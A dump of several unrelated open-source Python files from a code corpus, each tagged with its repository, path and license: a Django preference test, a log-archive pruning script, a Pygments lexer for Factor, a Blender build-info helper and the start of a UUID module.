UserPreferenceFactory.create(user=user, key="testkey2", value="{'some': 'json'}")
UserPreferenceFactory.create(
user=user,
key="testkey3",
value="\xe8\xbf\x99\xe6\x98\xaf\xe4\xb8\xad\xe5\x9b\xbd\xe6\x96\x87\xe5\xad\x97'"
)
def test_get_set_preference(self):
# Checks that you can set a preference and get that preference later
# Also, tests that no preference is returned for keys that are not set
user = UserFactory.create()
key = 'testkey'
value = 'testvalue'
# does a round trip
UserPreference.set_preference(user, key, value)
pref = UserPreference.get_preference(user, key)
self.assertEqual(pref, value)
# get preference for key that doesn't exist for user
pref = UserPreference.get_preference(user, 'testkey_none')
self.assertIsNone(pref)
| agpl-3.0 |
caibo2014/teuthology | teuthology/prune.py | 3 | 4784 | import logging
import os
import shutil
import time
import teuthology
from teuthology.contextutil import safe_while
log = logging.getLogger(__name__)
# If we see this in any directory, we do not prune it
PRESERVE_FILE = '.preserve'
def main(args):
"""
Main function; parses args and calls prune_archive()
"""
verbose = args['--verbose']
if verbose:
teuthology.log.setLevel(logging.DEBUG)
archive_dir = args['--archive']
dry_run = args['--dry-run']
pass_days = int(args['--pass'])
remotes_days = int(args['--remotes'])
prune_archive(archive_dir, pass_days, remotes_days, dry_run)
def prune_archive(archive_dir, pass_days, remotes_days, dry_run=False):
"""
Walk through the archive_dir, calling the cleanup functions to process
directories that might be old enough
"""
max_days = max(pass_days, remotes_days)
run_dirs = list()
log.debug("Archive {archive} has {count} children".format(
archive=archive_dir, count=len(os.listdir(archive_dir))))
for child in listdir(archive_dir):
item = os.path.join(archive_dir, child)
# Ensure that the path is not a symlink, is a directory, and is old
# enough to process
if (not os.path.islink(item) and os.path.isdir(item) and
is_old_enough(item, max_days)):
run_dirs.append(item)
for run_dir in run_dirs:
log.debug("Processing %s ..." % run_dir)
maybe_remove_passes(run_dir, pass_days, dry_run)
maybe_remove_remotes(run_dir, remotes_days, dry_run)
def listdir(path):
with safe_while(sleep=1, increment=1, tries=10) as proceed:
while proceed():
try:
return os.listdir(path)
except OSError:
log.exception("Failed to list %s !" % path)
def should_preserve(dir_name):
"""
Should the directory be preserved?
:returns: True if the directory contains a file named '.preserve'; False
otherwise
"""
preserve_path = os.path.join(dir_name, PRESERVE_FILE)
if os.path.isdir(dir_name) and os.path.exists(preserve_path):
return True
return False
def is_old_enough(file_name, days):
"""
:returns: True if the file's modification date is earlier than the amount
of days specified
"""
now = time.time()
secs_to_days = lambda s: s / (60 * 60 * 24)
age = now - os.path.getmtime(file_name)
if secs_to_days(age) > days:
return True
return False
def remove(path):
"""
Attempt to recursively remove a directory. If an OSError is encountered,
log it and continue.
"""
try:
shutil.rmtree(path)
except OSError:
log.exception("Failed to remove %s !" % path)
def maybe_remove_passes(run_dir, days, dry_run=False):
"""
Remove entire job log directories if they are old enough and the job passed
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Is it a job dir?
summary_path = os.path.join(item, 'summary.yaml')
if not os.path.exists(summary_path):
continue
# Is it a passed job?
summary_lines = [line.strip() for line in
file(summary_path).readlines()]
if 'success: true' in summary_lines:
log.info("{job} is a {days}-day old passed job; removing".format(
job=item, days=days))
if not dry_run:
remove(item)
def maybe_remove_remotes(run_dir, days, dry_run=False):
"""
Remove remote logs (not teuthology logs) from job directories if they are
old enough
"""
if days < 0:
return
contents = listdir(run_dir)
if PRESERVE_FILE in contents:
return
for child in contents:
item = os.path.join(run_dir, child)
# Ensure the path isn't marked for preservation, that it is a
# directory, and that it is old enough
if (should_preserve(item) or not os.path.isdir(item) or not
is_old_enough(item, days)):
continue
# Does it have a remote subdir?
remote_path = os.path.join(item, 'remote')
if not os.path.isdir(remote_path):
continue
log.info("{job} is {days} days old; removing remote logs".format(
job=item, days=days))
if not dry_run:
remove(remote_path)
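# Example invocation (illustrative only; the archive path and thresholds are
# made up): keep passed-job logs for 14 days and remote logs for 30 days,
# without actually deleting anything.
#
# prune_archive('/var/lib/teuthworker/archive', 14, 30, dry_run=True)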
| mit |
lucywyman/slides-ii | v/lib/python2.7/site-packages/pygments/lexers/factor.py | 72 | 17864 | # -*- coding: utf-8 -*-
"""
pygments.lexers.factor
~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Factor language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, default, words
from pygments.token import Text, Comment, Keyword, Name, String, Number
__all__ = ['FactorLexer']
class FactorLexer(RegexLexer):
"""
Lexer for the `Factor <http://factorcode.org>`_ language.
.. versionadded:: 1.4
"""
name = 'Factor'
aliases = ['factor']
filenames = ['*.factor']
mimetypes = ['text/x-factor']
flags = re.MULTILINE | re.UNICODE
builtin_kernel = words((
'-rot', '2bi', '2bi@', '2bi*', '2curry', '2dip', '2drop', '2dup', '2keep', '2nip',
'2over', '2tri', '2tri@', '2tri*', '3bi', '3curry', '3dip', '3drop', '3dup', '3keep',
'3tri', '4dip', '4drop', '4dup', '4keep', '<wrapper>', '=', '>boolean', 'clone',
'?', '?execute', '?if', 'and', 'assert', 'assert=', 'assert?', 'bi', 'bi-curry',
'bi-curry@', 'bi-curry*', 'bi@', 'bi*', 'boa', 'boolean', 'boolean?', 'both?',
'build', 'call', 'callstack', 'callstack>array', 'callstack?', 'clear', '(clone)',
'compose', 'compose?', 'curry', 'curry?', 'datastack', 'die', 'dip', 'do', 'drop',
'dup', 'dupd', 'either?', 'eq?', 'equal?', 'execute', 'hashcode', 'hashcode*',
'identity-hashcode', 'identity-tuple', 'identity-tuple?', 'if', 'if*',
'keep', 'loop', 'most', 'new', 'nip', 'not', 'null', 'object', 'or', 'over',
'pick', 'prepose', 'retainstack', 'rot', 'same?', 'swap', 'swapd', 'throw',
'tri', 'tri-curry', 'tri-curry@', 'tri-curry*', 'tri@', 'tri*', 'tuple',
'tuple?', 'unless', 'unless*', 'until', 'when', 'when*', 'while', 'with',
'wrapper', 'wrapper?', 'xor'), suffix=r'\s')
builtin_assocs = words((
'2cache', '<enum>', '>alist', '?at', '?of', 'assoc', 'assoc-all?',
'assoc-any?', 'assoc-clone-like', 'assoc-combine', 'assoc-diff',
'assoc-diff!', 'assoc-differ', 'assoc-each', 'assoc-empty?',
'assoc-filter', 'assoc-filter!', 'assoc-filter-as', 'assoc-find',
'assoc-hashcode', 'assoc-intersect', 'assoc-like', 'assoc-map',
'assoc-map-as', 'assoc-partition', 'assoc-refine', 'assoc-size',
'assoc-stack', 'assoc-subset?', 'assoc-union', 'assoc-union!',
'assoc=', 'assoc>map', 'assoc?', 'at', 'at+', 'at*', 'cache', 'change-at',
'clear-assoc', 'delete-at', 'delete-at*', 'enum', 'enum?', 'extract-keys',
'inc-at', 'key?', 'keys', 'map>assoc', 'maybe-set-at', 'new-assoc', 'of',
'push-at', 'rename-at', 'set-at', 'sift-keys', 'sift-values', 'substitute',
'unzip', 'value-at', 'value-at*', 'value?', 'values', 'zip'), suffix=r'\s')
builtin_combinators = words((
'2cleave', '2cleave>quot', '3cleave', '3cleave>quot', '4cleave',
'4cleave>quot', 'alist>quot', 'call-effect', 'case', 'case-find',
'case>quot', 'cleave', 'cleave>quot', 'cond', 'cond>quot', 'deep-spread>quot',
'execute-effect', 'linear-case-quot', 'no-case', 'no-case?', 'no-cond',
'no-cond?', 'recursive-hashcode', 'shallow-spread>quot', 'spread',
'to-fixed-point', 'wrong-values', 'wrong-values?'), suffix=r'\s')
builtin_math = words((
'-', '/', '/f', '/i', '/mod', '2/', '2^', '<', '<=', '<fp-nan>', '>',
'>=', '>bignum', '>fixnum', '>float', '>integer', '(all-integers?)',
'(each-integer)', '(find-integer)', '*', '+', '?1+',
'abs', 'align', 'all-integers?', 'bignum', 'bignum?', 'bit?', 'bitand',
'bitnot', 'bitor', 'bits>double', 'bits>float', 'bitxor', 'complex',
'complex?', 'denominator', 'double>bits', 'each-integer', 'even?',
'find-integer', 'find-last-integer', 'fixnum', 'fixnum?', 'float',
'float>bits', 'float?', 'fp-bitwise=', 'fp-infinity?', 'fp-nan-payload',
'fp-nan?', 'fp-qnan?', 'fp-sign', 'fp-snan?', 'fp-special?',
'if-zero', 'imaginary-part', 'integer', 'integer>fixnum',
'integer>fixnum-strict', 'integer?', 'log2', 'log2-expects-positive',
'log2-expects-positive?', 'mod', 'neg', 'neg?', 'next-float',
'next-power-of-2', 'number', 'number=', 'number?', 'numerator', 'odd?',
'out-of-fixnum-range', 'out-of-fixnum-range?', 'power-of-2?',
'prev-float', 'ratio', 'ratio?', 'rational', 'rational?', 'real',
'real-part', 'real?', 'recip', 'rem', 'sgn', 'shift', 'sq', 'times',
'u<', 'u<=', 'u>', 'u>=', 'unless-zero', 'unordered?', 'when-zero',
'zero?'), suffix=r'\s')
builtin_sequences = words((
'1sequence', '2all?', '2each', '2map', '2map-as', '2map-reduce', '2reduce',
'2selector', '2sequence', '3append', '3append-as', '3each', '3map', '3map-as',
'3sequence', '4sequence', '<repetition>', '<reversed>', '<slice>', '?first',
'?last', '?nth', '?second', '?set-nth', 'accumulate', 'accumulate!',
'accumulate-as', 'all?', 'any?', 'append', 'append!', 'append-as',
'assert-sequence', 'assert-sequence=', 'assert-sequence?',
'binary-reduce', 'bounds-check', 'bounds-check?', 'bounds-error',
'bounds-error?', 'but-last', 'but-last-slice', 'cartesian-each',
'cartesian-map', 'cartesian-product', 'change-nth', 'check-slice',
'check-slice-error', 'clone-like', 'collapse-slice', 'collector',
'collector-for', 'concat', 'concat-as', 'copy', 'count', 'cut', 'cut-slice',
'cut*', 'delete-all', 'delete-slice', 'drop-prefix', 'each', 'each-from',
'each-index', 'empty?', 'exchange', 'filter', 'filter!', 'filter-as', 'find',
'find-from', 'find-index', 'find-index-from', 'find-last', 'find-last-from',
'first', 'first2', 'first3', 'first4', 'flip', 'follow', 'fourth', 'glue', 'halves',
'harvest', 'head', 'head-slice', 'head-slice*', 'head*', 'head?',
'if-empty', 'immutable', 'immutable-sequence', 'immutable-sequence?',
'immutable?', 'index', 'index-from', 'indices', 'infimum', 'infimum-by',
'insert-nth', 'interleave', 'iota', 'iota-tuple', 'iota-tuple?', 'join',
'join-as', 'last', 'last-index', 'last-index-from', 'length', 'lengthen',
'like', 'longer', 'longer?', 'longest', 'map', 'map!', 'map-as', 'map-find',
'map-find-last', 'map-index', 'map-integers', 'map-reduce', 'map-sum',
'max-length', 'member-eq?', 'member?', 'midpoint@', 'min-length',
'mismatch', 'move', 'new-like', 'new-resizable', 'new-sequence',
'non-negative-integer-expected', 'non-negative-integer-expected?',
'nth', 'nths', 'pad-head', 'pad-tail', 'padding', 'partition', 'pop', 'pop*',
'prefix', 'prepend', 'prepend-as', 'produce', 'produce-as', 'product', 'push',
'push-all', 'push-either', 'push-if', 'reduce', 'reduce-index', 'remove',
'remove!', 'remove-eq', 'remove-eq!', 'remove-nth', 'remove-nth!', 'repetition',
'repetition?', 'replace-slice', 'replicate', 'replicate-as', 'rest',
'rest-slice', 'reverse', 'reverse!', 'reversed', 'reversed?', 'second',
'selector', 'selector-for', 'sequence', 'sequence-hashcode', 'sequence=',
'sequence?', 'set-first', 'set-fourth', 'set-last', 'set-length', 'set-nth',
'set-second', 'set-third', 'short', 'shorten', 'shorter', 'shorter?',
'shortest', 'sift', 'slice', 'slice-error', 'slice-error?', 'slice?',
'snip', 'snip-slice', 'start', 'start*', 'subseq', 'subseq?', 'suffix',
'suffix!', 'sum', 'sum-lengths', 'supremum', 'supremum-by', 'surround', 'tail',
'tail-slice', 'tail-slice*', 'tail*', 'tail?', 'third', 'trim',
'trim-head', 'trim-head-slice', 'trim-slice', 'trim-tail', 'trim-tail-slice',
'unclip', 'unclip-last', 'unclip-last-slice', 'unclip-slice', 'unless-empty',
'virtual-exemplar', 'virtual-sequence', 'virtual-sequence?', 'virtual@',
'when-empty'), suffix=r'\s')
builtin_namespaces = words((
'+@', 'change', 'change-global', 'counter', 'dec', 'get', 'get-global',
'global', 'inc', 'init-namespaces', 'initialize', 'is-global', 'make-assoc',
'namespace', 'namestack', 'off', 'on', 'set', 'set-global', 'set-namestack',
'toggle', 'with-global', 'with-scope', 'with-variable', 'with-variables'),
suffix=r'\s')
builtin_arrays = words((
'1array', '2array', '3array', '4array', '<array>', '>array', 'array',
'array?', 'pair', 'pair?', 'resize-array'), suffix=r'\s')
builtin_io = words((
'(each-stream-block-slice)', '(each-stream-block)',
'(stream-contents-by-block)', '(stream-contents-by-element)',
'(stream-contents-by-length-or-block)',
'(stream-contents-by-length)', '+byte+', '+character+',
'bad-seek-type', 'bad-seek-type?', 'bl', 'contents', 'each-block',
'each-block-size', 'each-block-slice', 'each-line', 'each-morsel',
'each-stream-block', 'each-stream-block-slice', 'each-stream-line',
'error-stream', 'flush', 'input-stream', 'input-stream?',
'invalid-read-buffer', 'invalid-read-buffer?', 'lines', 'nl',
'output-stream', 'output-stream?', 'print', 'read', 'read-into',
'read-partial', 'read-partial-into', 'read-until', 'read1', 'readln',
'seek-absolute', 'seek-absolute?', 'seek-end', 'seek-end?',
'seek-input', 'seek-output', 'seek-relative', 'seek-relative?',
'stream-bl', 'stream-contents', 'stream-contents*', 'stream-copy',
'stream-copy*', 'stream-element-type', 'stream-flush',
'stream-length', 'stream-lines', 'stream-nl', 'stream-print',
'stream-read', 'stream-read-into', 'stream-read-partial',
'stream-read-partial-into', 'stream-read-partial-unsafe',
'stream-read-unsafe', 'stream-read-until', 'stream-read1',
'stream-readln', 'stream-seek', 'stream-seekable?', 'stream-tell',
'stream-write', 'stream-write1', 'tell-input', 'tell-output',
'with-error-stream', 'with-error-stream*', 'with-error>output',
'with-input-output+error-streams',
'with-input-output+error-streams*', 'with-input-stream',
'with-input-stream*', 'with-output-stream', 'with-output-stream*',
'with-output>error', 'with-output+error-stream',
'with-output+error-stream*', 'with-streams', 'with-streams*',
'write', 'write1'), suffix=r'\s')
builtin_strings = words((
'1string', '<string>', '>string', 'resize-string', 'string',
'string?'), suffix=r'\s')
builtin_vectors = words((
'1vector', '<vector>', '>vector', '?push', 'vector', 'vector?'),
suffix=r'\s')
builtin_continuations = words((
'<condition>', '<continuation>', '<restart>', 'attempt-all',
'attempt-all-error', 'attempt-all-error?', 'callback-error-hook',
'callcc0', 'callcc1', 'cleanup', 'compute-restarts', 'condition',
'condition?', 'continuation', 'continuation?', 'continue',
'continue-restart', 'continue-with', 'current-continuation',
'error', 'error-continuation', 'error-in-thread', 'error-thread',
'ifcc', 'ignore-errors', 'in-callback?', 'original-error', 'recover',
'restart', 'restart?', 'restarts', 'rethrow', 'rethrow-restarts',
'return', 'return-continuation', 'thread-error-hook', 'throw-continue',
'throw-restarts', 'with-datastack', 'with-return'), suffix=r'\s')
tokens = {
'root': [
# factor allows a file to start with a shebang
(r'#!.*$', Comment.Preproc),
default('base'),
],
'base': [
(r'\s+', Text),
# defining words
(r'((?:MACRO|MEMO|TYPED)?:[:]?)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(M:[:]?)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Function)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(GENERIC:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(HOOK:|GENERIC#)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Function)),
(r'\(\s', Name.Function, 'stackeffect'),
(r';\s', Keyword),
# imports and namespaces
(r'(USING:)(\s+)',
bygroups(Keyword.Namespace, Text), 'vocabs'),
(r'(USE:|UNUSE:|IN:|QUALIFIED:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace)),
(r'(QUALIFIED-WITH:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text, Name.Namespace)),
(r'(FROM:|EXCLUDE:)(\s+)(\S+)(\s+=>\s)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text), 'words'),
(r'(RENAME:)(\s+)(\S+)(\s+)(\S+)(\s+=>\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Namespace, Text, Name.Function)),
(r'(ALIAS:|TYPEDEF:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function)),
(r'(DEFER:|FORGET:|POSTPONE:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function)),
# tuples and classes
(r'(TUPLE:|ERROR:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class), 'slots'),
(r'(TUPLE:|ERROR:|BUILTIN:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class), 'slots'),
(r'(MIXIN:|UNION:|INTERSECTION:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class)),
(r'(PREDICATE:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(INSTANCE:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(SLOT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Function)),
(r'(SINGLETON:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'SINGLETONS:', Keyword, 'classes'),
# other syntax
(r'(CONSTANT:|SYMBOL:|MAIN:|HELP:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'SYMBOLS:\s', Keyword, 'words'),
(r'SYNTAX:\s', Keyword),
(r'ALIEN:\s', Keyword),
(r'(STRUCT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'(FUNCTION:)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text)),
(r'(FUNCTION-ALIAS:)(\s+)(\S+)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function, Text)),
# vocab.private
(r'(?:<PRIVATE|PRIVATE>)\s', Keyword.Namespace),
# strings
(r'"""\s+(?:.|\n)*?\s+"""', String),
(r'"(?:\\\\|\\"|[^"])*"', String),
(r'\S+"\s+(?:\\\\|\\"|[^"])*"', String),
(r'CHAR:\s+(?:\\[\\abfnrstv]|[^\\]\S*)\s', String.Char),
# comments
(r'!\s+.*$', Comment),
(r'#!\s+.*$', Comment),
(r'/\*\s+(?:.|\n)*?\s\*/\s', Comment),
# boolean constants
(r'[tf]\s', Name.Constant),
# symbols and literals
(r'[\\$]\s+\S+', Name.Constant),
(r'M\\\s+\S+\s+\S+', Name.Constant),
# numbers
(r'[+-]?(?:[\d,]*\d)?\.(?:\d([\d,]*\d)?)?(?:[eE][+-]?\d+)?\s', Number),
(r'[+-]?\d(?:[\d,]*\d)?(?:[eE][+-]?\d+)?\s', Number),
(r'0x[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'NAN:\s+[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'0b[01]+\s', Number.Bin),
(r'0o[0-7]+\s', Number.Oct),
(r'(?:\d([\d,]*\d)?)?\+\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
(r'(?:\-\d([\d,]*\d)?)?\-\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
# keywords
(r'(?:deprecated|final|foldable|flushable|inline|recursive)\s',
Keyword),
# builtins
(builtin_kernel, Name.Builtin),
(builtin_assocs, Name.Builtin),
(builtin_combinators, Name.Builtin),
(builtin_math, Name.Builtin),
(builtin_sequences, Name.Builtin),
(builtin_namespaces, Name.Builtin),
(builtin_arrays, Name.Builtin),
(builtin_io, Name.Builtin),
(builtin_strings, Name.Builtin),
(builtin_vectors, Name.Builtin),
(builtin_continuations, Name.Builtin),
# everything else is text
(r'\S+', Text),
],
'stackeffect': [
(r'\s+', Text),
(r'\(\s+', Name.Function, 'stackeffect'),
(r'\)\s', Name.Function, '#pop'),
(r'--\s', Name.Function),
(r'\S+', Name.Variable),
],
'slots': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'(\{\s+)(\S+)(\s+[^}]+\s+\}\s)',
bygroups(Text, Name.Variable, Text)),
(r'\S+', Name.Variable),
],
'vocabs': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Namespace),
],
'classes': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Class),
],
'words': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Function),
],
}
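    # A minimal usage sketch, assuming the tokens table above belongs to a
    # Pygments RegexLexer subclass (e.g. FactorLexer); illustrative only, not
    # part of the lexer itself:
    #
    #     from pygments import highlight
    #     from pygments.formatters import TerminalFormatter
    #     factor_src = ': double ( x -- y ) 2 * ;'
    #     print(highlight(factor_src, FactorLexer(), TerminalFormatter()))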
| apache-2.0 |
pawkoz/dyplom | blender/build_files/cmake/project_source_info.py | 2 | 7070 | # ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Contributor(s): Campbell Barton
#
# ***** END GPL LICENSE BLOCK *****
# <pep8 compliant>
__all__ = (
"build_info",
"SOURCE_DIR",
)
import sys
if not sys.version.startswith("3"):
print("\nPython3.x needed, found %s.\nAborting!\n" %
sys.version.partition(" ")[0])
sys.exit(1)
import os
from os.path import join, dirname, normpath, abspath
SOURCE_DIR = join(dirname(__file__), "..", "..")
SOURCE_DIR = normpath(SOURCE_DIR)
SOURCE_DIR = abspath(SOURCE_DIR)
def is_c_header(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".h", ".hpp", ".hxx", ".hh"})
def is_c(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".c", ".cpp", ".cxx", ".m", ".mm", ".rc", ".cc", ".inl", ".osl"})
def is_c_any(filename):
    return is_c(filename) or is_c_header(filename)
# copied from project_info.py
CMAKE_DIR = "."
def cmake_cache_var_iter():
import re
re_cache = re.compile(r'([A-Za-z0-9_\-]+)?:?([A-Za-z0-9_\-]+)?=(.*)$')
with open(join(CMAKE_DIR, "CMakeCache.txt"), 'r', encoding='utf-8') as cache_file:
for l in cache_file:
match = re_cache.match(l.strip())
if match is not None:
var, type_, val = match.groups()
yield (var, type_ or "", val)
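# For illustration only: a typical CMakeCache.txt entry and how the regex in
# cmake_cache_var_iter() splits it (example values, not taken from a real cache):
#
#     CMAKE_C_COMPILER:FILEPATH=/usr/bin/cc
#     -> ("CMAKE_C_COMPILER", "FILEPATH", "/usr/bin/cc")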
def cmake_cache_var(var):
for var_iter, type_iter, value_iter in cmake_cache_var_iter():
if var == var_iter:
return value_iter
return None
def do_ignore(filepath, ignore_prefix_list):
if ignore_prefix_list is None:
return False
relpath = os.path.relpath(filepath, SOURCE_DIR)
return any([relpath.startswith(prefix) for prefix in ignore_prefix_list])
def makefile_log():
import subprocess
import time
# support both make and ninja
make_exe = cmake_cache_var("CMAKE_MAKE_PROGRAM")
make_exe_basename = os.path.basename(make_exe)
if make_exe_basename.startswith(("make", "gmake")):
print("running 'make' with --dry-run ...")
process = subprocess.Popen([make_exe, "--always-make", "--dry-run", "--keep-going", "VERBOSE=1"],
stdout=subprocess.PIPE,
)
elif make_exe_basename.startswith("ninja"):
print("running 'ninja' with -t commands ...")
process = subprocess.Popen([make_exe, "-t", "commands"],
stdout=subprocess.PIPE,
)
while process.poll():
time.sleep(1)
out = process.stdout.read()
process.stdout.close()
print("done!", len(out), "bytes")
return out.decode("utf-8", errors="ignore").split("\n")
def build_info(use_c=True, use_cxx=True, ignore_prefix_list=None):
makelog = makefile_log()
source = []
compilers = []
if use_c:
compilers.append(cmake_cache_var("CMAKE_C_COMPILER"))
if use_cxx:
compilers.append(cmake_cache_var("CMAKE_CXX_COMPILER"))
print("compilers:", " ".join(compilers))
fake_compiler = "%COMPILER%"
print("parsing make log ...")
for line in makelog:
args = line.split()
if not any([(c in args) for c in compilers]):
continue
        # join args in case they are not already a single string.
args = ' '.join(args)
args = args.replace(" -isystem", " -I")
args = args.replace(" -D ", " -D")
args = args.replace(" -I ", " -I")
for c in compilers:
args = args.replace(c, fake_compiler)
args = args.split()
# end
# remove compiler
args[:args.index(fake_compiler) + 1] = []
c_files = [f for f in args if is_c(f)]
inc_dirs = [f[2:].strip() for f in args if f.startswith('-I')]
defs = [f[2:].strip() for f in args if f.startswith('-D')]
for c in sorted(c_files):
if do_ignore(c, ignore_prefix_list):
continue
source.append((c, inc_dirs, defs))
# make relative includes absolute
# not totally essential but useful
for i, f in enumerate(inc_dirs):
if not os.path.isabs(f):
inc_dirs[i] = os.path.abspath(os.path.join(CMAKE_DIR, f))
# safety check that our includes are ok
for f in inc_dirs:
if not os.path.exists(f):
raise Exception("%s missing" % f)
print("done!")
return source
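# Note: each entry returned by build_info() is a (c_file, include_dirs, defines)
# tuple, e.g. (illustrative values only):
#
#     ("/src/blender/source/foo.c", ["/src/blender/source"], ["NDEBUG", "WITH_FOO"])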
def build_defines_as_source():
"""
Returns a string formatted as an include:
        '#define A=B\n#define....'
"""
import subprocess
# works for both gcc and clang
cmd = (cmake_cache_var("CMAKE_C_COMPILER"), "-dM", "-E", "-")
return subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.DEVNULL,
).stdout.read().strip().decode('ascii')
def build_defines_as_args():
return [("-D" + "=".join(l.split(maxsplit=2)[1:]))
for l in build_defines_as_source().split("\n")
if l.startswith('#define')]
# could be moved elsewhere!, this just happens to be used by scripts that also
# use this module.
def queue_processes(process_funcs, job_total=-1):
""" Takes a list of function arg pairs, each function must return a process
"""
if job_total == -1:
import multiprocessing
job_total = multiprocessing.cpu_count()
del multiprocessing
if job_total == 1:
for func, args in process_funcs:
sys.stdout.flush()
sys.stderr.flush()
process = func(*args)
process.wait()
else:
import time
processes = []
for func, args in process_funcs:
# wait until a thread is free
while 1:
processes[:] = [p for p in processes if p.poll() is None]
if len(processes) <= job_total:
break
else:
time.sleep(0.1)
sys.stdout.flush()
sys.stderr.flush()
processes.append(func(*args))
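# A minimal sketch of how queue_processes() might be driven; the compile
# command below is hypothetical and shown for illustration only:
#
#     import subprocess
#     funcs = [(subprocess.Popen, (["gcc", "-c", c],)) for c, _, _ in build_info()]
#     queue_processes(funcs)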
def main():
if not os.path.exists(join(CMAKE_DIR, "CMakeCache.txt")):
print("This script must run from the cmake build dir")
return
for s in build_info():
print(s)
if __name__ == "__main__":
main()
| gpl-2.0 |
openhatch/oh-mainline | vendor/packages/django-extensions/django_extensions/utils/uuid.py | 44 | 20400 | r"""UUID objects (universally unique identifiers) according to RFC 4122.
This module provides immutable UUID objects (class UUID) and the functions
uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5
UUIDs as specified in RFC 4122.
If all you want is a unique ID, you should probably call uuid1() or uuid4().
Note that uuid1() may compromise privacy since it creates a UUID containing
the computer's network address. uuid4() creates a random UUID.
Typical usage:
>>> import uuid
# make a UUID based on the host ID and current time
>>> uuid.uuid1()
UUID('a8098c1a-f86e-11da-bd1a-00112444be1e')
# make a UUID using an MD5 hash of a namespace UUID and a name
>>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org')
UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e')
# make a random UUID
>>> uuid.uuid4()
UUID('16fd2706-8baf-433b-82eb-8c7fada847da')
# make a UUID using a SHA-1 hash of a namespace UUID and a name
>>> uuid.uuid5(uuid.NAMESPACE_DNS, 'python.org')
UUID('886313e1-3b8a-5372-9b90-0c9aee199e5d')
# make a UUID from a string of hex digits (braces and hyphens ignored)
>>> x = uuid.UUID('{00010203-0405-0607-0809-0a0b0c0d0e0f}')
# convert a UUID to a string of hex digits in standard form
>>> str(x)
'00010203-0405-0607-0809-0a0b0c0d0e0f'
# get the raw 16 bytes of the UUID
>>> x.bytes
'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f'
# make a UUID from a 16-byte string
>>> uuid.UUID(bytes=x.bytes)
UUID('00010203-0405-0607-0809-0a0b0c0d0e0f')
"""
__author__ = 'Ka-Ping Yee <[email protected]>'
RESERVED_NCS, RFC_4122, RESERVED_MICROSOFT, RESERVED_FUTURE = [
'reserved for NCS compatibility', 'specified in RFC 4122',
'reserved for Microsoft compatibility', 'reserved for future definition'
]
class UUID(object):
"""Instances of the UUID class represent UUIDs as specified in RFC 4122.
UUID objects are immutable, hashable, and usable as dictionary keys.
Converting a UUID to a string with str() yields something in the form
'12345678-1234-1234-1234-123456789abc'. The UUID constructor accepts
five possible forms: a similar string of hexadecimal digits, or a tuple
